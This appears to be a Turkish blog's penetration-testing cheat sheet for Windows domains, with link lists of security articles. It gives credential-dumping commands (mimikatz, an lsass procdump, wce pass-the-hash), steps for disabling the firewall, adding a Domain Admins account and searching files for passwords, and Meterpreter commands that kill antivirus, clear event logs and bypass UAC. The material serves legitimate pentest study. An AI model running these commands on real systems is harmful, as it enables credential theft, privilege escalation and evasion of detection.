Etki Alanı Sızma Testlerinde Kullanılabilecek Komutlar

Etki Alanı Sızma Testlerinde Kullanılabilecek Komutlar
Oturumunda Olunan Kullanıcının Adı
whoami
echo %computername%\%username%

Kullanıcıya Ait Tüm Bilgiler
whoami /all

Açık portlar
netstat -ano -p TCP

Açık portlar (Saniyede bir güncellenir)
netstat -ano 1

Açık portu kullanan uygulama
netstat -abf
Örnek: TCP 192.168.0.97:2854 193.140.13.200:imaps ESTABLISHED [OUTLOOK.EXE]

RDP ile bağlanılan makineler
netstat -ano | findstr 3389 | findstr /v 0.0.0.0:3389

Zamanlanmış görevler
schtasks /query /fo LIST /v | findstr "Folder: HostName: Author: Run: TaskName: Comment:"

Zamanlanmış görev oluşturma
at \\192.168.32.62 15:00 "cmd.exe"

Çalışan servislerin listelenmesi
sc query
sc queryex            (PID değeri de içerir)

Bir servisi kapatma
net stop PolicyAgent

Servisleri Listeleme
wmic service get name, displayname, started | findstr /C:Term

Remote Desktop'u etkinleştirmek
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set service remotedesktop enable

Remote Assistant'ı etkinleştirmek
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

Başka bir kullanıcı gibi komut satırını çalıştırma
runas /env /user:FENER\alex cmd

Bir servisi disable etme
sc config PlugPlay start= disabled
(Power, PlugPlay gibi kapatılamayan servisler devre dış bırakılıp, makine yeniden başlatılırsa bu servis çalışmaz.)
net stop TermService

Çalışan prosesleri servisine göre listeleme ve filtreleme
tasklist SVC | findstr /I "msseces.exe"

Çalışan proseslerin detayları
wmic process where (executablepath like "%system32%" and name!="svchost.exe" or Priority = "8" ) get HandleCount, Name, ParentProcessId, Priority, ProcessId, ThreadCount /Every:3 >  C:\Users\DenemeKullanici\Desktop\Sonuc.txt

Çalışan prosesi öldürme
taskkill /F /T /IM filezillaftp.exe

Uzaktaki Bilgisayarın Sistemi
psinfo \\172.16.4.230 -h -s -d

SYSTEM kullanıcı hakkını elde etme
PSEXEC -s cmd.exe

Uzaktaki Bilgisayarın Komut Satırına Geçmek
psexec \\172.16.4.230 -u FENER\alex -p 1907?Fenerbahce cmd.exe -i 0

Uzaktaki Bilgisayarda çalışan prosesler
tasklist /V /S 172.16.72.129 /U FENER\alex /P 1907?Fenerbahce

Makinede Açık Olan Tüm Oturumlar
query session
qwinsta

Oturumu açık kullanıcıları elde etme
query session /server:MSGE-PC

3 nolu oturumu düşürme
reset session 3 /server:MSGE-PC

Grup İlkesinin Güncellenmesi
gpupdate /force

Grup İlkesi
gpresult /z
gpresult /H C:\Users\UygulananIlke.html

Denetim Kurallarını elde etme
auditpol /get /category:*

Bir Registry kaydını elde etme
reg query HKLM\System\CurrentControlSet\Control\Lsa /v crashonauditfail

Bir Audit kaydını düzenleme
auditpol /set /subcategory:"IPsec Driver" /success:enable /failure:disable

Belli isimdeki bir dosyanın / klasörün aranması
dir H:/Muziklerim /s /b | findstr Sezen > liste.txt
tree H:/Muziklerim /F  | findstr Sezen > liste.txt

Parola politikası
net accounts
net accounts /uniquepw:5

Güvenlik duvarını aktifliğini kontrol etme
netsh firewall show opmode
netsh advfirewall show allprofiles

Güvenlik duvarını etkinsizleştirme
netsh advfirewall set allprofiles state off
netsh firewall set opmode mode=DISABLE
netsh advfirewall set currentprofile state off

Düşürülen paketleri loglama
netsh firewall set logging droppedpackets = enable
netsh firewall set logging connections = enable
Logların düştüğü dizin:          %systemroot%\System32\LogFiles\Firewall\pfirewall.log

Kayıtlı kritik bilgileri elde etme
Get-ChildItem -Path C:\docs, C:\inetpub, C:\PerfLogs, C:\ProgramData, C:\Users -Include *.txt,  *.log, *.bat, *.reg, *.cs, *.sql, *.ps1, *.config, *.properties  -Recurse | Select-String -Pattern Password, password, Sifre, sifre, Parola, parola, Şifre, şifre, root, admin -casesensitive > C:\Windows\_Arama.txt
Uzantılar: txt, log, bat, reg, cs, sql, ps1, config, properties , ora, xml, java, doc, docx, pdf, xls, xlsx, csv, html, xhtml, htm, cmd, php, py, rb, sh, vbs, c, cfg, mhtml, asp, aspx, jsp, pl, eml, ini, inf
Kaynak: http://en.wikipedia.org/wiki/List_of_file_formats

Kullanıcı & Grup işlemleri
net user --> Tüm yerel kullanıcılar listelenir.
net user YeniKullanici --> Belli bir yerel kullanıcının özellikleri listelenir.
net user YeniKullanici Deneme123. /add
net localgroup
net localgroup "Remote Desktop Users"
net localgroup Administrators YeniKullanici /add
net user /domain
net user YeniHesap /domain
net user YeniHesap Deneme123. /domain /add
net group /domain
net group "Domain Admins" /domain
net group "Domain Admins" YeniHesap /domain /add

Bilgisayar işlemleri
net group "Domain Computers" /domain
net group "Domain Controllers" /domain
Get-ADComputer -Filter { OperatingSystem -Like '*XP*' } -Properties OperatingSystem | Format-Table Name, OperatingSystem -Wrap -Auto

Bağlı Olunan Domain Controller
echo %LOGONSERVER%
systeminfo | findstr "Domain:"

Windows Güven İlişkileri
nltest /domain_trusts --> Tüm güven ilişkilerini listeler
nltest /dcname:Sirket --> Belli bir domaindeki PDC sunucusunu sorgular.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).Domains --> Forest içerisindeki tüm domain'ler listelenir.
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() --> Mevcut domain için tüm güven ilişkileri (Parent-Child, 2 yönlü vs) listelenir.


Saldırı amaçlı komutlar
net use \\<Win_IP>\C$ /user:<WORKGROUP>\Tubitak  Aa123456
psexec \\<Win_IP> -u WORKGROUP\tubitak -p Aa123456 cmd.exe
mimikatz > privilege::debug > sekurlsa::logonPasswords
wce -s WORKGROUP:Administrator:<LM>:<NTLM>

procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz > sekurlsa::minidump lsass.dmp > sekurlsa::logonPasswords

net time \\<Win_IP>
at \\<Win_IP> 10:32 C:\Yeni_Klasor\Procdump_Betik.bat
@echo off
C:\Yeni_Klasor\procdump.exe -accepteula -ma lsass.exe C:\Yeni_Klasor\Hedef_LSASS.dmp

Komut Satırı: Network Komutları

Network İle İlgili Komutlar

22. porttan RDP servisinin çalıştırılması

REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x16 /f

443. porttan gelen talepleri dinleme
tcpdump -nnvi eth0 proto TCP and port 443


Security Checklist: Unix/Linux

Unix/Linux Sistemleri Güvenlik Denetimi

Template document for hardened systems: February, 2006

Kaynak site: 
http://www.ucd.ie/webteam/itservices07/desktopsecurity/research/Unix%20Baseline%20v%202.pdf

Guide to linux configuration files/Servers
Kaynak site: 
http://how-to.wikia.com/wiki/Guide_to_linux_configuration_files/Servers

20 Linux Server Hardening Security Tips
Kaynak site: 
http://www.cyberciti.biz/tips/linux-security.html

Linux Hardening
Kaynak site: 
http://resources.infosecinstitute.com/linux-hardening/

Unix Denetimi
Kaynak site: 
http://blog.btrisk.com/2014/04/unix-denetimi.html

Okunası Makaleler: Hash

Hash

How to identify different types of password hashes

Kaynak site: 
http://ubuntuonline.wordpress.com/2012/09/21/how-to-identify-different-types-of-password-hashes/

Kriptografik Özet ve Benzer Dosyaların Ayırt Edilmesi
Kaynak site: 
https://www.bilgiguvenligi.gov.tr/adli-analiz/kriptografik-ozet-ve-benzer-dosyalarin-ayirt-edilmesi.html

İpuçları

İpuçları

Keyboard Shortcuts in Remote Desktop Connection (RDC) for Navigation

Kaynak site: 
http://www.mydigitallife.info/keyboard-shortcuts-in-remote-desktop-connection-rdc-for-navigation/

Hak5 925 – Break into shell with MsPaint, Launchy, BackTrack Wireless and more
Kaynak site: 
http://hak5.org/episodes/hak5-925

Problems
Kaynak site: 
http://projecteuler.net/problems

SecurityTube Metasploit Framework Expert (SMFE) Course Material
Kaynak site: 
http://www.securitytube.net/groups?operation=view&groupId=10

Batch File Commands
Kaynak site: 
http://academic.evergreen.edu/projects/biophysics/technotes/program/batch.htm

Scanning NetBIOS
Kaynak site: 
http://pentestlab.wordpress.com/2012/08/19/scanning-netbios/

How to run Control Panel tools by typing a command 
Kaynak site: 
http://support.microsoft.com/kb/192806/en-us

Nessus Compliance and Audit Download Center
Kullanımı: 
www.tenable.com --> Support Portal --> Username/Password girişi yapılır --> Downloads --> Compliance and Audit Files

Fingerprint & WCE
wce.exe aracına '-w' parametresi verilerek, bir bilgisayarda açık oturumu olan hesapların parolaları açık halde elde edilebilir. Bir kullanıcı şifresini girmeden biyometrik yollarla (parmak izi, retina vs) oturumunu açmış olsa bile, mevcut şifresi yine de wce.exe aracı ile açık halde elde edilebilir.

İpucu: WCE'den Kaçınma Yöntemi
Kaynak site: 
http://ertugrulbasaranoglu.blogspot.com/2012/10/ipucu-wceden-kacnma-yontemi.html

Okunası Makaleler: Genel Güvenlik

Genel Güvenlik Makaleleri

BT Varlıklarının Güvenlik Testi Adımları

Kaynak site:
http://www.bilgiguvenligi.gov.tr/guvenlik-testleri/bt-varliklarinin-guvenlik-testi-adimlari-3.html

Backtrack Linux -101 Eğitimi
Kaynak site:
http://www.bga.com.tr/calismalar/btlinux101/

Writing a Penetration Testing Report
Kaynak site:
http://www.sans.org/reading_room/whitepapers/bestprac/writing-penetration-testing-report_33343

CIS Security Benchmark Division Resources
Kaynak site:
https://benchmarks.cisecurity.org/en-us/?route=downloads.multiform

Varlık Bağımlılıkları ve Hiyerarşik Varlık Envanteri
Kaynak site:
http://www.bilgiguvenligi.gov.tr/bt-guv.-standartlari/varlik-bagimliliklari-ve-hiyerarsik-varlik-envanteri.html

Zaafiyet Yönetimi Sistemi (ZYS)
Kaynak site:
https://www.bilgiguvenligi.gov.tr/is-surekliligi/zaafiyet-yonetimi-sistemi-zys.html

Bilgi Güvenliğinde Sızma Testleri
Kaynak site:
http://www.cozumpark.com/blogs/gvenlik/archive/2013/01/20/bilgi-g-venli-inde-s-zma-testleri.aspxl


Okunası Makaleler: Ağ Güvenliği

Ağ Güvenliği Makaleleri

Ağ Güvenliği Test ve Denetim Araçları

Kaynak site:
http://www.bilgiguvenligi.gov.tr/guvenlik-testleri/ag-guvenligi-test-ve-denetim-araclari-3.html

Layer 2 Güvenlik Yöntemleri (Bölüm 1)
Kaynak site: 
http://www.agciyiz.net/index.php/guvenlik/layer-2-guvenlik-yontemleri-bolum-1/

When Are ICMP Redirects Sent?
Kaynak site:
http://www.cisco.com/en/US/tech/tk365/technologies_tech_note09186a0080094702.shtml
Önlem: C:\Windows\system32>reg query HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v "EnableICMPRedirect" /t REG_DWORD /d 0 /f

Protect Against SYN, ICMP, SNMP & AFD.SYS Attacks
Kaynak site: 
http://ratnayesu.blogspot.com/2010_04_01_archive.html

Additional Registry Entries
Kaynak site: 
http://technet.microsoft.com/en-us/library/cc766102(v=ws.10).aspx

Homeland Security: Disable UPnP as tens of millions at risk
Kaynak site: 
http://www.zdnet.com/homeland-security-disable-upnp-as-tens-of-millions-at-risk-7000010512/
https://community.rapid7.com/docs/DOC-2150
http://www.bilgiguvenligi.gov.tr/ag-guvenligi/ev-ve-ofis-aglarindaki-gizli-tehlike-upnp-kullanilabilirlik-guvenlik-dengesi.html

Okunası Makaleler: SSH / Tünel

SSH / Tünel Makaleleri

SSH Tunneling ile Güvenli Surf ve SSH Port Forwarding

Kaynak site:
http://www.syslogs.org/ssh-tunneling-ile-guvenli-surf-ve-ssh-port-forwarding/

Survey Finds Secure Sites Not So Secure
Kaynak site:
https://threatpost.com/en_us/blogs/survey-finds-secure-sites-not-so-secure-042712

SSH Nedir? SSH Ne Demektir? SSH Hakkında Bilgi
Kaynak site:
http://www.pcrehberi.org/14/05/2011/bilgisayar-temel-bilgileri/ssh-nedir-ssh-ne-demektir-ssh-hakkinda-bilgi.html/

VPN vs. SSH Tunnel: Which Is More Secure?
Kaynak site:
http://www.howtogeek.com/118145/vpn-vs.-ssh-tunnel-which-is-more-secure/

Top 20 OpenSSH Server Best Security Practices
Kaynak site:
http://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-practices.html


SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
Kaynak site:
http://www.bga.com.tr/calismalar/ssh_proxy.pdf

Okunası Makaleler: Sertifika / SSL

Sertifika / SSL Makaleleri

Prensip
Sign with MY Private, Encrypt with YOUR Public

Sertifika ve SSL Kavramları
Kaynak site:
http://www.cozumpark.com/blogs/gvenlik/archive/2010/09/25/sertifika-ve-ssl-kavramlar.aspx

Sertifika - Sertifika Oluşturma - Sertifika Türleri
Kaynak site:
http://www.bilgiguvenligi.gov.tr/guvenlik-teknolojileri/sertifika-sertifika-olusturma-sertifika-turleri.html

DDoS Attacks on SSL: Something Old, Something New
Kaynak site:
http://ddos.arbornetworks.com/2012/04/ddos-attacks-on-ssl-something-old-something-new/

Automate testing SSL/TLS clients for resistance against MITM attacks
Kaynak site:
http://www.gremwell.com/sslcaudit_files/doc/sslcaudit-user-guide-1.0.pdf

https nasıl çalışır
Kaynak site:
http://www.networkpentest.net/2011/08/https-nasl-calsr.html

SSL/TLS Deployment Best Practices
Kaynak site:
https://www.ssllabs.com/downloads/SSL_TLS_Deployment_Best_Practices_1.0.pdf

HTTP - Nass oluyor da oluyor? HTTPS - HTTP over SSL
Kaynak site:
http://umut-simsek.blogspot.com/2012/06/http-nass-oluyor-da-oluyor-https-http.html

CSR Decoder
Kaynak site:
http://www.sslshopper.com/csr-decoder.html

OpenSSL Public/Private Key Encryption
Kaynak site:
http://www.liatsisfotis.com/2012/04/openssl-publicprivate-key-encryption.html

Kısa Uzunluktaki Cipherlardan Kaynaklanan Zafiyetlerin Giderilmesi
Kaynak site:
http://www.cozumpark.com/blogs/gvenlik/archive/2013/01/27/k-sa-uzunluktaki-cipherlardan-kaynaklanan-zafiyetlerin-giderilmesi.aspx

Okunası Makaleler: DoS / DDoS

DoS/DDoS Makaleleri

DNS Hizmetine Yönelik Dos/DDoS Saldırıları
Kaynak site:
http://www.bga.com.tr/calismalar/dns_ddos.pdf

BGA 2011 DDoS Pentest ve Analiz Raporu
Kaynak site:
http://blog.bga.com.tr/2012/04/bga-2011-ddos-pentest-ve-analiz-raporu.html

DDoS Attacks on SSL: Something Old, Something New
Kaynak site:
http://ddos.arbornetworks.com/2012/04/ddos-attacks-on-ssl-something-old-something-new/

Siber Saldırı Aracı Olarak DDoS
Kaynak site:
http://www.bga.com.tr/calismalar/siber_savas_ddos.pdf

Hosting Firmalarına yönelik DDoS Saldırıları ve Çözüm Önerileri
Kaynak site:
http://www.bga.com.tr/calismalar/Hosting_DDoS.pdf

Netscreen Firewall DDoS Ayarları
Kaynak site:
http://www.bga.com.tr/calismalar/netscreen_ddos.pdf

DDoS Saldırı Analizi: DDoS Saldırılarında IP Analizi
Kaynak site:
http://www.bga.com.tr/calismalar/ddos_analizi.pdf

DDoS Saldırıları Nasıl Gerçekleştirilir?
Kaynak site:
http://www.bga.com.tr/calismalar/bga_ddos-botnet-ankara-2.pdf

SynFlood DDOS Saldırıları: SynFlood saldırıları ve korunma yolları
Kaynak site:
http://www.bga.com.tr/calismalar/synflood.pdf

Özgür Yazılımlarla DDOS Saldırılarını Engelleme
Kaynak site:
http://www.bga.com.tr/calismalar/opensource-ddos-engelleme.pdf

DOS, DDOS Atakları ve Korunma Yöntemleri
Kaynak site:
http://www.bga.com.tr/calismalar/ddos_ataklar_ve_korunma.pdf

DDoS Saldırıları ve Korunma Yolları
Kaynak site:
http://www.bga.com.tr/calismalar/ddos_ataklar_ve_korunma.pdf

Web Sunuculara Yönelik DOS/DDOS Saldırıları
Kaynak site:
http://www.bga.com.tr/calismalar/web_ddos.pdf

DDoS and Security Reports: The Arbor Networks Security Blog
Kaynak site:
http://ddos.arbornetworks.com/2012/05/stepping-forward-with-the-2012-world-ipv6-launch/

Why Firewalls and Intrusion Prevention Systems (IPS) Fall Short on DDoS Protection
Kaynak site:
http://www.arbornetworks.com/ddos/Why%20Firewalls%20and%20Intrusion%20Prevention%20Systems%20Fall%20Short%20on%20DDoS%20Protection.pdf

Protocol Analysis and Defeating DDoS in FreeBSD Kernel
Kaynak site:
http://www.nopcon.org/sunumlar/NebiSenol-FreeBSD.pdf

DDoS nedir, ne değildir?
Kaynak site:
http://www.siberguvenlik.org.tr/ddos-nedir-ne-degildir/

DDoS attacks, so simple so dangerous
Kaynak site:
http://securityaffairs.co/wordpress/8259/security/ddos-attacks-so-simple-so-dangerous.html?goback=%2Egde_37658_member_155139624

DDoS Türleri
Kaynak site:
http://blog.btrisk.com/2014/05/dos-turleri.html


DDoS Önlemleri: DDoS NEDİR, NE YAPMALIYIM?
Kaynak site:
http://ekaragol.blogspot.com.tr/2013/11/ddos-onlemleri.html


DoS DDoS Saldırıları ve Korunma Yöntemleri Kitabı
Kaynak site:
http://www.slideshare.net/bgasecurity/dos-ddos-saldrlar-ve-korunma-yntemleri-kitab

Okunası Makaleler: Windows

Windows Makaleleri

Managing Security Dependencies on Windows Networks
Kaynak site:
http://www.windowsitpro.com/content1/topic/managing-security-dependencies-windows-networks-142470/catpath/security

Forgot administrator password? The Sticky Keys trick
Kaynak site:
http://4sysops.com/archives/forgot-the-administrator-password-the-sticky-keys-trick/

Security Vulnerabilities Published In 2012
Kaynak site:
http://www.cvedetails.com/vulnerability-list.php?vendor_id=26&product_id=739&version_id=&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=2012&month=0&cweid=0&order=3&trc=24&sha=ae01f10b142929c25950e042d74165ffa1b2c1e4

The trust relationship between this domain and the primary domain failed
Kaynak site:
http://siberblog.org/index.php/the-trust-relationship-between-this-domain-and-the-primary-domain-failed/

Distinguished Names
Kaynak site:
http://msdn.microsoft.com/en-us/library/windows/desktop/aa366101(v=vs.85).aspx

WS2008: Network Level Authentication and Encryption
Kaynak site:
http://blogs.technet.com/b/askperf/archive/2008/02/16/ws2008-network-level-authentication-and-encryption.aspx

Top 10 Windows Security Configurations: Where and How!
Kaynak site:
http://www.windowsecurity.com/articles/Top-10-Windows-Security-Configurations-Where-How-Part1.html

Well-known security identifiers in Windows operating systems
Kaynak site:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;243330

Sysprep nedir ? Nasıl yapılır ?
Kaynak site:
http://www.vanstechelman.eu/windows/group_policy_settings


MCITP 70-640: Active Directory forest and trees
Kaynak site:
http://www.youtube.com/watch?v=Whh3kPS0FdA





5 Ekim 2012 Cuma

Bazı Meterpreter Komutları

Bazı Meterpreter Komutları

Hedef Sistemin Kabuğuna Düşme
execute -f cmd.exe -H -i
shell

Hedef Sistemde Dosya Arama
search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.pdf

Hedef Sistemden veri çekme, veri yükleme
upload BackTrackDizinindekiDosya KurbanBilgisayarDizinindekiDosya
download KurbanBilgisayarDizinindekiDosya BackTrackDizinindekiDosya

Makineyi yeniden başlatma
reboot

Antivirüsü kapatma
killav
Not: Bu modül tam olarak çalışmayabilir. Bu sebeple hedef makinenin kabuğuna düşüldükten sonra, önce AV prosesi bulunur. Sonra ilgili servisi bulunarak kapatılır veya disable edilip yeniden başlatılır. Daha sonra da AV prosesi sonlandırılır.

Event logları silme
clearev

UAC atlatma
run post/windows/escalate/bypassuac

Arp taraması ile makine keşfi
run arp_scanner -r 192.168.25.1/24

Parola özetlerini elde etme
hashdump
Ayrıntılı bilgi için bakınız.

Mevcut prosesleri listeleme
ps

Mevcut prosese sıçrama
migrate <Proses_Id>

Bilgisayarda işlem yapılmama vaktini tespit etme
idletime

Meterpreter'ın çalıştığı prosesin kullanıcısını izleme
getuid

Meterpreter'ın çalıştığı prosesin ID değerini izleme
getpid

SYSTEM hakkına sahip olma
getsystem

Oturumu kapatmadan Meterpreter'dan MSF'e geçiş
background

Oturumu kapatarak Meterpreter'dan MSF'e geçiş
exit

4 Ekim 2012 Perşembe

Bazı Metasploit Modülleri

Metasploit Modülleri

Hedef Sistemlerdeki Belgeleri Çekme Modülü
post/windows/gather/int_doc_find
Kaynak site:
http://pentestn00b.wordpress.com/2012/06/19/metasploit-post-module-interesting-documents-finder/

Bypass UAC (User Account Control) with Metasploit
post/windows/escalate/bypassuac
Kaynak site:
http://www.youtube.com/watch?feature=player_embedded&v=JzBw_949Qac#!
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html

Otomatik olarak çoklu modül ile çalışmak
post_auto.rb
Kaynak site:
https://github.com/darkoperator/Metasploit-Plugins/blob/master/post_auto.rb

Setting SYSTEM's proxy settings with Metasploit
enum_proxy
clone_proxy_settings
Kaynak site:
http://www.room362.com/blog/2012/10/21/setting-systems-proxy-settings-with-metasploit.html

Hedef Sistemin Komut Satırına Bağlanma
exploit/windows/smb/psexec
Kaynak site:
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash

Hedef Sistemde Son Kullanan Dokümanları Listeleme
 post/windows/gather/dumplinks
Kaynak site:
http://www.offensive-security.com/metasploit-unleashed/Windows_Post_Gather_Modules#dumplinks




1 Ekim 2012 Pazartesi

Domainden Elde Edilebilecek Bazı Önemli Bilgiler

Domain Bilgileri

Bağlı Olunan Domain Controller
echo %LOGONSERVER%
systeminfo | findstr "Domain:"

Active Directory Üzerindeki Konum
gpresult /V | findstr CN=

Domaindeki Kullanıcılar
net user /domain

Domaindeki Gruplar
net groups /domain

Domain Yöneticileri
net group "Domain Admins" /domain

Domaindeki Makineler
net group "Domain Computers" /domain

Domain Controller Makineler
net group "Domain Controllers" /domain

Oturumunda Olunan Kullanıcının Adı
whoami
echo %computername%\%username%

Kullanıcıya Ait Tüm Bilgiler
whoami /all

Kullanıcıyı Yerel Yöneticiler Grubuna Eklemek
net localgroup Administrators ertugrul.basaranoglu /add

Domaindeki hesap politikası 
net accounts

Uzaktaki Bilgisayarın Sistemi
psinfo \\172.16.4.230 -h -s -d

Uzaktaki Bilgisayarın Komut Satırına Geçmek
psexec \\172.16.4.230 -u FENER\alex -p 1907?Fenerbahce cmd.exe -i 0

Uzaktaki Bilgisayarda çalışan prosesler
tasklist /V /S 172.16.72.129 /U FENER\alex /P 1907?Fenerbahce

Makinede Açık Olan Tüm Oturumlar
query session
qwinsta

Grup İlkesinin Güncellenmesi
gpupdate /force

Grup İlkesi
gpresult /z

Domain Yöneticilerinin Domaindeki İlke Bilgileri
for /f "delims=" %X in (DomainAdminsGrubuUyeleri_Listesi.txt) do net user %X /domain >> DomainAdminsGrubuUyelerininİlkeBilgileri.txt
Not: Tek bir kullanıcının domain ilke bilgisini elde etmek için aşağıdaki komut kullanılabilir:
          net user ertugrul.basaranoglu /domain
Not: Oturumu açılan bir kullanıcının domain ilke bilgisini elde etmek için aşağıdaki komut kullanılabilir:
          whoami /all
Not: Girdi olarak verilen liste (DomainAdminsGrubuUyeleri_Listesi.txt), Domain Yöneticilerini bulurken elde edilen kayıtların tek tek alt alta yazdırılmasıyla oluşmuştur.

Domain Yöneticilerinin Domaindeki Tüm Bilgileri
for /f "delims=" %X in (DomainUsersGrubundakiKullanicilar_Listesi.txt) do gpresult /USER %X /V >> DomainAdminsGrubuUyelerininDomaindekiTumBilgileri.txt
Not: Tek bir kullanıcının domaindeki tüm bilgilerini elde etmek için aşağıdaki komut kullanılabilir:
          gpresult /USER ertugrul.basaranoglu /Z
Not: Girdi olarak verilen liste (DomainAdminsGrubuUyeleri_Listesi.txt), Domain Yöneticilerini bulurken elde edilen kayıtların tek tek alt alta yazdırılmasıyla oluşmuştur.

Kullanıcıların Açık Olan Oturumları
for /f "delims=" %X in (DomainUsersGrubundakiKullanicilar_Listesi.txt) do PsLoggedon -l %X >> KullanicilarinAcikOlanOturumlari.txt
Not: Tek bir kullanıcının açık olan oturumunu elde etmek için aşağıdaki komut kullanılabilir:
          PsLoggedon -l ertugrul.basaranoglu
Not: Girdi olarak verilen liste (DomainUsersGrubundakiKullanicilar_Listesi.txt), Domain Kullanıcılarını bulurken elde edilen kayıtların tek tek alt alta yazdırılmasıyla oluşmuştur.
Not: Domain Controller makinesinde Security Event'lerdeki kayıtlardan tek bir kullanıcının açık olan oturumunu elde etmek için aşağıdaki power shell komutu kullanılabilir:
          Get-EventLog security 4624 -newest 10000 | Where-Object{$_.Message -like '*ertugrul.basaranoglu*'}| format-list Message

Bilgisayarlarda Oturumu Açık Olan Kullanıcılar
for /f "delims=" %X in (DomainComputersGrubundakiBilgisayarlar_Listesi.txt) do PsLoggedon -l \\%X >> BilgisayarlardaOturumuAcikKalanKullanicilar.txt
Not: Tek bir bilgisayarda açık olan kullanıcı oturumlarını elde etmek için aşağıdaki komut kullanılabilir:
          PsLoggedon -l \\TestBilgisayari
          logonsessions.exe /p
          Get-WmiObject -Class Win32_NetworkLoginProfile | Sort-Object -Property LastLogon -Descending | Select-Object -Property * -First 1 | Where-Object {$_.LastLogon -match "(\d{14})"} | Foreach-Object { New-Object PSObject -Property @{ Name=$_.Name;LastLogon=[datetime]::ParseExact($matches[0], "yyyyMMddHHmmss", $null)}}
Not: Girdi olarak verilen liste (DomainComputersGrubundakiBilgisayarlar_Listesi.txt), Domain Bilgisayarlarını bulurken elde edilen kayıtların tek tek alt alta yazdırılmasıyla oluşmuştur.

Uzak Masaüstü Protokolünü Etkinleştirme
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

Audit İlkesi
auditpol /get /category:*

Group İlkesi Arayüzü
rsop.msc

Disable Durumdaki Tüm Kullanıcılar
dsquery user "dc=fener,dc=tubitak,dc=gov,dc=tr" -disabled -limit 0 | dsget user -samid > disableduser.txt

Parolası Sona Ermeyecek Olan Tüm Kullanıcılar
Get-ADUser -Filter 'PasswordNeverExpires -eq $true' -Server localDC | select name

Domaindeki Kullanıcının Ofis, Görev vs Bilgileri
dsquery user -samid FENER\alex | dsget user -office -desc -display > AlexBilgileri.txt

NonExpired Durumdaki Tüm Kullanıcılar
dsquery * domainroot -limit 800 -filter "(&(objectClass=user) (userAccountControl>=65536))" -attr sAMAccountName userPrincipalName userAccountControl -d fener.tubitak.gov.tr
dsquery * domainroot -filter “(&(objectcategory=person)(objectclass=user)(lockoutTime=*))” -limit 0

Kullanıcıya ait oturumdaki ilk biletlerin saklandığı yerlerin kaydı
reg query "\\192.168.170.62\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit

Domaindeki gruplar ve üyeleri
dsquery group -limit 0 | dsget group -members –expand

Domaindeki Windows 2008 Sunucularının Listesi
Get-ADComputer -Filter {OperatingSystem -Like "Windows Server*2008*"} -Property * | Format-Table Name,OperatingSystem,OperatingSystemServicePack -Wrap -Auto

Domaindeki kullanıcıları oturum açma vakitlerine göre listeleme
Get-ADUser -Filter * -Properties "LastLogonDate" | sort-object -property lastlogondate -descending | Format-Table -property name, lastlogondate -AutoSize

90 gündür oturum açmamış olan kullanıcıları listeleme
Search-ADAccount -UsersOnly -AccountInactive -TimeSpan 90 | ?{$_.enabled -eq $True} | where {$ _.ObjectClass -eq 'user'} | Get-ADUser -Properties EmailAddress, DisplayName, Name, sn, lastlogondate, passwordlastset | Select EmailAddress, Name, lastlogondate, passwordlastset

Kullanıcısı olmayan grupların listelenmesi
Get-ADGroup -Filter {GroupCategory -eq 'Security'} | ?{@(Get-ADGroupMember $_).Length -eq 0}

6 aydır hesabı aktif olmayan kullanıcıları listeleme
$sixMonths = (Get-Date).AddMonths(-6)
Search-ADAccount -accountinactive -usersonly -datetime "$sixMonths"

4 haftadır aktif olmayan kullanıcıları disable etme
dsquery user "dc=pearson,dc=itcertification,dc=com" -inactive 4 | dsmod user -disabled yes

60 gündür parolasını değiştirmeyen kullanıcılar
dsquery user "dc=pearson,dc=itcertification,dc=com" -stalepwd 60 > stale.txt

Parolası sona ermeyen kullanıcılar
Get-ADUser -Filter 'PasswordNeverExpires -eq $true' -Server localDC | select name
Search-ADAccount -PasswordNeverExpires | FT Name,ObjectClass -A
Get-ADUser -filter {(Description -notlike "Service*") -and (Enabled -eq "True") -and (PasswordNeverExpires -eq "True")} -properties *) | select samaccountname,description

Domain Kullanıcıların mail adresleri
dsquery user -name "user name"|dsget user -samid -email -display
get-mailbox | fl name, emailaddresses
Get-QADUser -SizeLimit 0 -Enabled -Email * | Select-Object DisplayName,Email


İlişkili Sayfalar
http://technet.microsoft.com/en-us/library/cc722416(v=ws.10).aspx
http://www.robvanderwoude.com/ntadmincommands.php
http://ckerekes.com/dsquery.shtml
http://ss64.com/nt/dsquery-user.html
http://www.netspi.com/blog/2012/07/09/5-ways-to-find-systems-running-domain-admin-processes/
http://social.technet.microsoft.com/Forums/en-US/winserverpowershell/thread/eaff2f69-d17b-4235-9f8a-9f42840cac56/